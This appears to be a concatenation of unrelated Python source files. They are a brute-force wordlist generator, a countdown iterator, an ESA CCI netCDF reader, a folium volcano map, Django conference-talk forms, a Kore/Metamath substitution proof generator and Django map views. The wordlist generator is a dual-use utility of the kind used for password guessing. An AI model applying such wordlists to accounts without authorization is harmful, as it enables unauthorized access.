save_to_file = False
filename = ""
min_len = 0
max_len = 0
char_set = string.ascii_letters + string.digits + string.punctuation
help_text = """wordlist-generator 0.1 ( https://github.com/nicolai-h/wordlist-generator )
USAGE:
wordlist-generator -s <min_len> -l <max_len> [options]
OPTIONS:
-s, --shortest: specify minimum length of generated words
-l, --longest: specify maximum length of generated words
-c, --character-set: specify the character set used for generating the words
-o, --output: specify the file where the generated words should be stored
-h, --help: get help info
DEFAULTS:
minimum length: 0
maximum length: 0
character set: 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
output: by default the generated words will be printed out to the terminal
EXAMPLE USAGE:
python3 wordlist_gen.py -s 2 -l 4 -c abcd -o test.txt
"""
def gen_wordlist(argv):
global save_to_file
global filename
global min_len
global max_len
global char_set
global help_text
if len(argv) == 0:
print(help_text)
sys.exit()
try:
opts, args = getopt.getopt(argv, "s:l:c:o:h", ["shortest=", "longest=", "character-set=", "output=", "help"])
except getopt.GetoptError:
print(EXCEPTION_COLOR + "generate_wordlist --shortest <min_len> --longest <max_len> --character-set <char_set> --output <output_file>" + END_COLOR)
sys.exit()
for opt, arg in opts:
if opt in ("-h", "--help"):
print(help_text)
sys.exit()
elif opt in ("-o", "--output"):
save_to_file = True
filename = arg
elif opt in ("-c", "--character-set"):
char_set = arg
elif opt in("-s", "--shortest"):
try:
min_len = int(arg)
except ValueError:
print(EXCEPTION_COLOR + "minimum length needs to be a number" + END_COLOR)
sys.exit()
elif opt in ("-l", "--longest"):
try:
max_len = int(arg)
except ValueError:
print(EXCEPTION_COLOR + "maximum length needs to be a number" + END_COLOR)
sys.exit()
def create_wordlist():
diff_len = max_len - min_len
if save_to_file == True:
with open(filename, 'w') as f:
for i in range(max_len-min_len+1):
for ele in product(char_set, repeat=min_len+i):
f.write(''.join(ele) + '\n')
else:
for i in range(max_len-min_len+1):
for ele in product(char_set, repeat=min_len+i):
print(''.join(ele))
if __name__ == "__main__":
gen_wordlist(sys.argv[1:])
create_wordlist()
|
# encoding =utf-8 #
class Countdown:
def __init__(self,start):
self.start= start
def __iter__(self):
n = self.start
while n >0:
yield n
n-=1
def __reversed__(self):
n=1
while n <=self.start:
yield n
n+=1
if __name__ == '__main__':
for rr in reversed(Countdown(10)):
print(rr)
|
# Copyright (c) 2015,Vienna University of Technology,
# Department of Geodesy and Geoinformation
# All rights reserved.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL VIENNA UNIVERSITY OF TECHNOLOGY,
# DEPARTMENT OF GEODESY AND GEOINFORMATION BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
Module contains the Class for reading ESA CCI data in netCDF Format
Created on Fri Mar 27 15:12:18 2015
@author: Christoph.Paulik@geo.tuwien.ac.at
'''
import netCDF4 as nc
import numpy as np
import os
import pygeogrids.grids as grids
class ESACCI_grid(grids.BasicGrid):
"""
ESA CCI grid class
Attributes
----------
land_ind: numpy.ndarray
indices of the land points
"""
def __init__(self, lsmaskfile=None):
if lsmaskfile is None:
lsmaskfile = os.path.join(os.path.dirname(__file__), "..", "bin",
"esa-cci",
"ESACCI-SOILMOISTURE-LANDMASK_V0.4.nc")
with nc.Dataset(lsmaskfile) as ls:
# flip along the latitude axis to fit together with the images from the
# CCI data. This inconsitency was already reported to the CCI team.
land = ls.variables['land'][::-1, :].data == 1
all_ind = np.arange(land.size)
land_ind = all_ind[land.flat == True]
self.land_ind = land_ind
longrid, latgrid = np.meshgrid(ls.variables['lon'][:],
ls.variables['lat'][::-1])
super(ESACCI_grid, self).__init__(longrid.flatten(), latgrid.flatten(),
subset=self.land_ind, shape=(1440, 720))
class ESACCI_netcdf(object):
"""
Class for reading ESA CCI data from netCDF files
Caches the following:
- time variable
- keeps the dataset open as long as the instance exists
"""
def __init__(self, fname, variables=None, avg_var=None, time_var='time', lat_var='lat', lon_var='lon'):
"""
Parameters
----------
self: type
description
fname: string
filename
variables: list, optional
if given only these variables will be read
avg_var: list, optional
list of variables for which to calculate the average if not given
it is calculated for all variables
time_var: string, optional
name of the time variable in the netCDF file
lat_var: string, optional
name of the latitude variable in the netCDF file
lon_var: string, optional
name of the longitude variable in the netCDF file
"""
self.fname = fname
self.ds = nc.Dataset(fname)
self.lat_var = lat_var
self.lon_var = lon_var
self.time_var = time_var
self.avg_var = avg_var
if variables is None:
self.variables = self.ds.variables.keys()
# exclude time, lat and lon from variable list
self.variables.remove(self.time_var)
self.variables.remove(self.lat_var)
self.variables.remove(self.lon_var)
else:
self.variables = variables
self._init_grid()
def _init_grid(self):
"""
initialize the grid of the dataset
"""
self.grid = ESACCI_grid()
def get_timeseries(self, locationid, date_start=None, date_end=None):
"""
Parameters
----------
locationid: int
location id as lat_index * row_length + lon_index
date_start: datetime, optional
start date of the time series
date_end: datetime, optional
end date of the time series
Returns
-------
ts : dict
"""
start_index, end_index = None, None
if date_start is not None:
start_index = nc.netcdftime.date2index(date_start,
self.ds.variables[self.time_var])
if date_end is not None:
end_index = nc.netcdftime.date2index(date_end,
self.ds.variables[self.time_var])
date_slice = slice(start_index, end_index, None)
# get row, column from location id
row, col = self.grid.gpi2rowcol(locationid)
ts = {}
for v in self.variables:
ts[v] = self.ds.variables[v][date_slice, row, col]
return ts
def get_avg_image(self, date_start, date_end=None, cellID=None):
"""
Reads image from dataset, takes the average if more than one value is in the result array.
Parameters
----------
date_start: datetime
start date of the image to get. If only one date is given then
the whole day of this date is read
date_end: datetime, optional
end date of the averaged image to get
cellID: int, optional
cell id to which the image should be limited, for ESA CCI this is
not defined at the moment.
"""
if date_end is None:
date_end = date_start
img = self.get_data(date_start, date_end)
# calculate average
for v in img:
if self.avg_var is not None:
if v in self.avg_var:
img[v] = img[v].mean(axis=0)
else:
img[v] = img[v].mean(axis=0)
return img
def get_data(self, date_start, date_end, cellID=1):
"""
Reads date cube from dataset
Parameters
----------
date_start: datetime
start date of the image to get. If only one date is given then
the whole day of this date is read
date_end: datetime
end date of the averaged image to get
cellID: int
cell id to which the image should be limited, for ESA CCI this is
not defined at the moment.
"""
start_index = nc.netcdftime.date2index(date_start,
self.ds.variables[self.time_var])
end_index = nc.netcdftime.date2index(date_end,
self.ds.variables[self.time_var])
date_slice = slice(start_index, end_index + 1, None)
img = {}
for v in self.variables:
img[v] = self.ds.variables[v][date_slice, :, :]
return img
|
import folium
import pandas
data = pandas.read_csv("Volcanoes_USA.txt")
lat = list(data["LAT"])
lon = list(data["LON"])
elev = list(data["ELEV"])
def color_producer(elevation):
if elevation <= 1500:
return "pink"
if 1500 < elevation <= 3000:
return "purple"
else:
return "blue"
map = folium.Map(location=[38.01, -99.09], zoom_start=6, tiles="Mapbox Bright")
fgv = folium.FeatureGroup(name="Volcanoes")
# for lt, ln, el in zip(lat, lon, elev):
# fg.add_child(folium.Marker(location=[lt, ln], popup=str(el) + " m", icon=folium.Icon(color=color_producer(el))))
for lt, ln, el in zip(lat, lon, elev):
fgv.add_child(folium.CircleMarker(location=[lt, ln], radius=el/300, popup=str(el) + " m", fill = True,
fill_color=color_producer(el), color='grey', fill_opacity=0.7))
fgp = folium.FeatureGroup(name="Population")
fgp.add_child(folium.GeoJson(open(file='world.json').read()))
map.add_child(fgv)
map.add_child(fgp)
map.add_child(folium.LayerControl())
map.save("Map1.html")
|
# -*- coding: utf-8 -*-
from django import forms
from django.utils.translation import ugettext_lazy as _
from django.conf import settings
from models import Topic, TopicLabel, Language, LanguageLabel, Country, CountryLabel, Transportation, TransportationLabel, Talk, License, LicenseLabel, CaptureLicense
# construction dynamique des classes de formulaires
bases = (forms.ModelForm,)
def base__init__(self, *args, **keys):
"""
Alimentation du formulaire en modification
"""
if 'instance' in keys and keys['instance']:
instance = keys['instance']
property_dct = {}
if self.label_model:
labels = self.label_model.objects.filter(parent=instance)
for label in labels:
property_dct['label_%s_%d' % (label.language, label.label_number)] = label.value
if 'initial' in keys:
keys['initial'].update(property_dct)
else:
keys['initial'] = property_dct
forms.ModelForm.__init__(self, *args, **keys)
def base_save(self, *args, **keys):
"""
Sauvegarde du formulaire avec prise en compte du champ libellé
"""
new_obj = forms.ModelForm.save(self, *args, **keys)
new_obj.save()
def save_labels(self, label_model, nb_labels, extra_id=''):
if not label_model:
return
labels = label_model.objects.filter(parent=new_obj)
old_languages = []
for label in labels:
if label.label_number >= nb_labels:
label.delete()
label.save()
continue
lbl = self.cleaned_data[extra_id + 'label_%s_%d' % (label.language,
label.label_number)]
old_languages.append((label.language, label.label_number))
label.value = lbl
label.save()
# initialisation des labels non présents en base
for idx in xrange(nb_labels):
for language_id, language_label in settings.LANGUAGES:
if (language_id, idx) not in old_languages:
lbl = self.cleaned_data[extra_id + 'label_%s_%d' % (language_id, idx)]
label_model.objects.create(parent=new_obj, value=lbl,
language=language_id, label_number=idx)
save_labels(self, self.label_model, self.nb_labels)
return new_obj
def get_attributes(base_class):
labels = base_class.labels
atts = {'nb_labels': len(labels)}
for idx in xrange(len(labels)):
for language_id, language_label in settings.LANGUAGES:
atts['label_%s_%d' % (language_id, idx)] = \
forms.CharField(label=labels[idx][1] + u" (%s)" % language_label,
widget=forms.TextInput, required=False, max_length=256)
atts['__init__'] = base__init__
atts['save'] = base_save
return atts
TopicAdminFormBase = getattr(forms.ModelForm, '__metaclass__', type) \
('TopicAdminFormBase', bases, get_attributes(Topic))
class TopicAdminForm(TopicAdminFormBase):
label_model = TopicLabel
class Meta:
model = Topic
LanguageAdminFormBase = getattr(forms.ModelForm, '__metaclass__', type) \
('LanguageAdminFormBase', bases, get_attributes(Language))
class LanguageAdminForm(LanguageAdminFormBase):
label_model = LanguageLabel
class Meta:
model = Language
CountryAdminFormBase = getattr(forms.ModelForm, '__metaclass__', type) \
('CountryAdminFormBase', bases, get_attributes(Country))
class CountryAdminForm(CountryAdminFormBase):
label_model = CountryLabel
class Meta:
model = Country
LicenseAdminFormBase = getattr(forms.ModelForm, '__metaclass__', type) \
('LicenseAdminFormBase', bases, get_attributes(License))
class LicenseAdminForm(LicenseAdminFormBase):
label_model = LicenseLabel
class Meta:
model = License
TransportationAdminFormBase = getattr(forms.ModelForm, '__metaclass__', type) \
('TransportationAdminFormBase', bases, get_attributes(Transportation))
class TransportationAdminForm(TransportationAdminFormBase):
label_model = TransportationLabel
class Meta:
model = Transportation
# Ugly hack
from django.forms import widgets
from django.utils.encoding import force_unicode
from itertools import chain
from operator import itemgetter
class SortedForm(widgets.Select):
def render_options(self, choices, selected_choices):
# Normalize to strings.
selected_choices = set([force_unicode(v) for v in selected_choices])
values = []
for k, v in chain(self.choices, choices):
values.append((k, v))
values.sort(key=itemgetter(1))
output = []
for option_value, option_label in values:
output.append(self.render_option(selected_choices, option_value, option_label))
return u'\n'.join(output)
_iattrs = {'class': 'text', 'size': 60}
_tattrs = {'cols': '60', 'rows': '8'}
class TalkForm(forms.ModelForm):
language = forms.ModelChoiceField(label=_(u"Language"),
queryset=Language.objects.all(), empty_label=None,
initial=Language.objects.get(code='en'))
topic = forms.ModelChoiceField(label=_(u"Topic"),
queryset=Topic.objects.all(), empty_label=None, widget=SortedForm)
title = forms.CharField(
label=_(u"Title"),
min_length=5, widget=forms.TextInput(attrs=_iattrs))
translated_title = forms.CharField(
label=_(u"Title in French (or Dutch)"),
required=False,
widget=forms.TextInput(attrs=_iattrs))
nature = forms.ChoiceField(
label=_(u"Type"), choices=Talk.NATURES, required=True)
abstract = forms.CharField(
label=_(u"Summary"),
widget=forms.Textarea(attrs=_tattrs),
help_text=_(u"A description of what the talk would be about. This abstract will be published on the website."),
)
translated_abstract = forms.CharField(
label=_(u"Summary in French (or Dutch)"),
widget=forms.Textarea(attrs=_tattrs),
help_text=_(u"If you can write an abstract in French, please do so."),
required=False,
)
slides_language = forms.ModelChoiceField(label=_(u"Slides Language"),
queryset=Language.objects.all(), empty_label=None,
initial=Language.objects.get(code='en'))
license = forms.ModelChoiceField(
label=_(u"License"), required=False,
queryset=License.objects.order_by('order'),
help_text=_(u"The preferred license for your support files (contact us if you would like us to add another license)."),
)
capture = forms.ChoiceField(
label=_(u"Capture"), choices=Talk.YES_NO, required=False,
help_text=_(u"Choose “yes” if the speaker(s) agree for the talk to be captured (audio and/or video) and published on the event website (and probably spread on the whole Internet)."),
)
capture_license = forms.ChoiceField(
label=_(u"Capture License"), choices=Talk.CAPTURE_LIC,
required=False,
help_text=_(u"The preferred license for the capture of the talk (contact us if you would like us to add another license)."),
initial="cc-by-sa",
)
constraints = forms.CharField(label=_(u"Constraints"),
widget=forms.Textarea(attrs=_tattrs), required=False,
help_text=_(u"If the speaker(s) have special needs, constraints (be scheduled on a specific date, disabled person moving with a wheelchair, etc) or something else."),
)
for_general_public = forms.BooleanField(label=_(u"General public"), required=False)
for_professionals = forms.BooleanField(label=_(u"Professionals"), required=False)
for_decision_makers = forms.BooleanField(label=_(u"Decision makers"), required=False)
for_geeks = forms.BooleanField(label=_(u"Geeks"), required=False)
fil_rouge_auquotidien = forms.BooleanField(label=_(u"Freedom in Everyday Life"), required=False)
fil_rouge_2 = forms.BooleanField(label=_(u"Societal Challenges"), required=False)
fil_rouge_3 = forms.BooleanField(label=_(u"Open Data"), required=False)
fil_rouge_4 = forms.BooleanField(label=_(u"Cloud"), required=False)
speakers = forms.CharField(label=_(u"Speaker(s)"), widget=forms.Textarea(attrs=_tattrs),
help_text=_(u"First name, last name, email of the speaker(s). One speaker per line. Each line should respect the following format: « Firstname Lastname [speaker@domain.tld] »"),
)
biography = forms.CharField(label=_(u"Biography"), widget=forms.Textarea(attrs=_tattrs),
help_text=_(u"Add a few words about the speaker(s). Their, work, activities, involvement in free software, etc. It will be published with the abstract on the event website."),
)
translated_biography = forms.CharField(label=_(u"Biography in French"), widget=forms.Textarea(attrs=_tattrs),
help_text=_(u"Same but in French. If you don't know French, don't worry, we'll handle this for you."),
required=False,
)
charges = forms.ChoiceField(label=(_(u"Refund charges")),
choices=Talk.NO_YES_MAYBE, required=False)
transportation = forms.ModelChoiceField(label=_(u"Transportation"),
queryset=Transportation.objects.all(), required=False)
city = forms.CharField(label=_(u"City"), min_length=3,
required=False, widget=forms.TextInput(attrs=_iattrs))
country = forms.ModelChoiceField(label=_(u"Country"), widget=SortedForm,
required=False, queryset=Country.objects.all())
cost = forms.CharField(label=_(u"Estimated cost (euros)"),
required=False, widget=forms.TextInput(attrs=_iattrs),
help_text=_(u"If you know the estimated cost of the transportation, it will be easier for us to have a clear view of the expenses we could engage."),
)
class Meta:
model = Talk
exclude = ('status', 'notes')
def clean(self):
cleaned_data = self.cleaned_data
capture = cleaned_data.get('capture')
license = cleaned_data.get('license')
charges = cleaned_data.get('charges')
city = cleaned_data.get('city')
country = cleaned_data.get('country')
speakers = cleaned_data.get('speakers')
if capture == '1' and license == None:
self._errors['license'] = self.error_class([_(u"This field is required.")])
del cleaned_data['license']
if charges != '0':
if city == '':
self._errors['city'] = self.error_class([_(u"This field is required.")])
del cleaned_data['city']
if country == None:
self._errors['country'] = self.error_class([_(u"This field is required.")])
del cleaned_data['country']
if speakers != None:
if speakers.strip() == '':
self._errors['speakers'] = self.error_class([_(u"This field is required.")])
else:
speaker_re = Talk.speaker_re()
speakers = speakers.strip()
errors = []
success = []
for s in speakers.split("\n"):
s = s.strip()
if speaker_re.match(s) == None:
errors.append(s)
else:
success.append(s)
if errors != []:
errors.reverse()
errors.append(_(u"The following lines don't match the correct format:"))
errors.reverse()
self._errors['speakers'] = self.error_class(errors)
del cleaned_data['speakers']
return cleaned_data
class TalkAdminForm(TalkForm):
notes = forms.CharField(label=_(u"Notes"),
required=False, widget=forms.Textarea(attrs=_tattrs))
class Meta:
exclude = ()
|
from typing import Union, Tuple
from ml.kore import ast as kore
from ml.kore.utils import KoreUtils
from ml.metamath import ast as mm
from ml.metamath.composer import Proof, Theorem
from .encoder import KorePatternEncoder
from .env import ProofEnvironment, ProofGenerator
"""
Given a kore pattern phi, pattern psi, and variable x, generate a proof for
#Substitution phi[psi/x] phi psi x
where phi[psi/x] is the actual pattern with x substituted with phi,
with the assumption that distinct meta #Variable varible are disjoint
This also support substituting sort variables
"""
class SingleSubstitutionProofGenerator(ProofGenerator, kore.KoreVisitor):
def __init__(self, env: ProofEnvironment, var: Union[kore.Variable, kore.SortVariable], substitute: Union[kore.Pattern, kore.Sort]):
super().__init__(env)
self.var = var
self.substitute = substitute
self.var_encoded = self.env.encode_pattern(var)
self.substitute_encoded = self.env.encode_pattern(substitute)
# get a "template" for the target statement
# for convenience
tmp1, tmp2 = self.env.gen_metavariables("#Pattern", 2)
self.target = mm.StructuredStatement(
mm.Statement.PROVABLE,
[
mm.Application("#Substitution"),
mm.Metavariable(tmp1),
mm.Metavariable(tmp2),
self.substitute_encoded,
self.var_encoded,
]
)
"""
Additional to proof, also return a actual substituted pattern/sort
"""
def visit_and_substitute(self, pattern_or_sort: Union[kore.Pattern, kore.Sort]) -> Tuple[Proof, Union[kore.Pattern, kore.Sort]]:
proof = super().visit(pattern_or_sort)
if isinstance(pattern_or_sort, kore.Pattern):
substituted = KoreUtils.copy_and_substitute_pattern(pattern_or_sort, { self.var: self.substitute })
else:
substituted = KoreUtils.copy_and_substitute_sort(pattern_or_sort, { self.var: self.substitute })
return proof, substituted
def postvisit_axiom(self, axiom: kore.Axiom) -> Proof:
# prove substitution of the pattern
# \kore-forall-sort S1 ... \kore-forall-sort Sn \kore-valid ph0 ph1
pattern_sort = KoreUtils.infer_sort(axiom.pattern)
pattern_subst_proof = self.visit(axiom.pattern)
sort_subst_proof = self.visit(pattern_sort)
proof = self.env.get_theorem("substitution-kore-valid").apply(
sort_subst_proof,
pattern_subst_proof,
)
shadowed_index = len(axiom.sort_variables)
if isinstance(self.var, kore.SortVariable):
# try to locate the position of the quantifer
# which coincides with the substitution variables
for i, sort_var in enumerate(axiom.sort_variables):
if sort_var == self.var:
shadowed_index = i
break
if shadowed_index < len(axiom.sort_variables):
body = proof.statement.terms[1]
for sort_var in axiom.sort_variables[shadowed_index + 1:][::-1]:
encoded_sort_var = KorePatternEncoder.encode_sort_variable(sort_var)
body = mm.Application(
KorePatternEncoder.FORALL_SORT,
[
mm.Metavariable(encoded_sort_var),
body,
],
)
proof = self.env.get_theorem("substitution-kore-forall-sort-shadowed").apply(
x=self.var_encoded,
ph0=body,
ph1=self.substitute_encoded,
)
# wrap the rest of forall-sort quantifiers
for sort_var in axiom.sort_variables[:shadowed_index][::-1]:
encoded_sort_var = KorePatternEncoder.encode_sort_variable(sort_var)
proof = self.env.get_theorem("substitution-kore-forall-sort").apply(
proof,
x=mm.Metavariable(encoded_sort_var)
)
return proof
def postvisit_sort_instance(self, sort_instance: kore.SortInstance) -> Proof:
symbol = KorePatternEncoder.encode_sort(sort_instance)
return self.env.substitution_axioms[symbol].match_and_apply(
self.target,
*[ self.visit(arg) for arg in sort_instance.arguments ],
)
def postvisit_sort_variable(self, sort_variable: kore.SortVariable) -> Proof:
if sort_variable.name == self.var.name:
return self.env.get_theorem("substitution-var-same").apply(
ph0=self.substitute_encoded,
xX=self.var_encoded
)
else:
return self.env.get_theorem("substitution-var-diff").apply(
yY=self.env.encode_pattern(sort_variable),
ph0=self.substitute_encoded,
xX=self.var_encoded,
)
def postvisit_variable(self, var: kore.Variable) -> Proof:
if var.name == self.var.name:
return self.env.get_theorem("substitution-var-same").apply(
ph0=self.substitute_encoded,
xX=self.var_encoded
)
else:
return self.env.get_theorem("substitution-var-diff").apply(
yY=self.env.encode_pattern(var),
ph0=self.substitute_encoded,
xX=self.var_encoded,
)
def postvisit_string_literal(self, literal: kore.StringLiteral) -> Proof:
symbol = KorePatternEncoder.encode_string_literal(literal)
return self.env.substitution_axioms[symbol].match_and_apply(self.target)
def postvisit_application(self, application: kore.Application) -> Proof:
symbol = KorePatternEncoder.encode_symbol(application.symbol)
return self.env.substitution_axioms[symbol].match_and_apply(
self.target,
*[ self.visit(arg) for arg in application.symbol.sort_arguments + application.arguments ],
)
def postvisit_ml_pattern(self, ml_pattern: kore.MLPattern) -> Proof:
substitution_axiom_map = {
kore.MLPattern.TOP: "substitution-kore-top",
kore.MLPattern.BOTTOM: "substitution-kore-bottom",
kore.MLPattern.NOT: "substitution-kore-not",
kore.MLPattern.AND: "substitution-kore-and",
kore.MLPattern.OR: "substitution-kore-or",
kore.MLPattern.CEIL: "substitution-kore-ceil",
kore.MLPattern.FLOOR: "substitution-kore-floor",
kore.MLPattern.EQUALS: "substitution-kore-equals",
kore.MLPattern.IN: "substitution-kore-in",
kore.MLPattern.REWRITES: "substitution-kore-rewrites",
kore.MLPattern.REWRITES_STAR: "substitution-kore-rewrites-star",
kore.MLPattern.DV: "substitution-kore-dv",
kore.MLPattern.IMPLIES: "substitution-kore-implies",
}
if ml_pattern.construct in substitution_axiom_map:
return self.env.get_theorem(substitution_axiom_map[ml_pattern.construct]).apply(
*[ self.visit(arg) for arg in ml_pattern.sorts + ml_pattern.arguments ],
)
elif ml_pattern.construct in { kore.MLPattern.FORALL, kore.MLPattern.EXISTS }:
binding_var = ml_pattern.get_binding_variable()
body = ml_pattern.arguments[1]
body_sort = ml_pattern.sorts[0]
if binding_var == self.var:
theorem_name = "substitution-kore-forall-shadowed" if ml_pattern.construct == kore.MLPattern.FORALL else \
"substitution-kore-exists-shadowed"
# var_sort_subproof = self.visit(binding_var.sort)
# body_sort_subproof = self.visit(body_sort)
# shadowed
return self.env.get_theorem(theorem_name).apply(
# var_sort_subproof,
# body_sort_subproof,
ph2=self.env.encode_pattern(body),
)
else:
theorem_name = "substitution-kore-forall" if ml_pattern.construct == kore.MLPattern.FORALL else \
"substitution-kore-exists"
var_sort_subproof = self.visit(binding_var.sort)
# body_sort_subproof = self.visit(body_sort)
body_subproof = self.visit(body)
encoded_body_sort = self.env.encode_pattern(body_sort)
return self.env.get_theorem(theorem_name).apply(
var_sort_subproof,
# body_sort_subproof,
body_subproof,
ph1=encoded_body_sort,
ph4=encoded_body_sort,
y=self.env.encode_pattern(binding_var), # still need to specify the binding variable
)
else:
raise Exception("unsupported construct {}".format(ml_pattern))
|
from json import loads, dumps
from django.shortcuts import render
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import requires_csrf_token, ensure_csrf_cookie
from django_mobile import get_flavour
from .models import Location, MapParameter
# Create your views here.
@ensure_csrf_cookie
def index(request):
"""
Returns the Random Walker web page according to device
"""
if get_flavour() != 'full':
return render(request, 'random_walker_engine/_m_random_walker_engine.html')
else:
return render(request, 'random_walker_engine/_random_walker_engine.html')
@requires_csrf_token
def generate_new_destination(request):
"""
Generates a new random location
"""
if request.method == 'POST':
params = MapParameter(request)
request_data = loads(request.body)
new_destination = params.sample_destination(request_data['n_sample'])
# Return the destination
return HttpResponse(dumps(new_destination),
content_type="application/json")
@requires_csrf_token
@login_required
def show_location_history(request):
"""
Query previous points and return the geojson for plot
"""
if request.method == 'POST':
params = MapParameter(request)
previous_points = params.get_location_history(toJson = True)
return HttpResponse(dumps(previous_points),
content_type="application/json")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.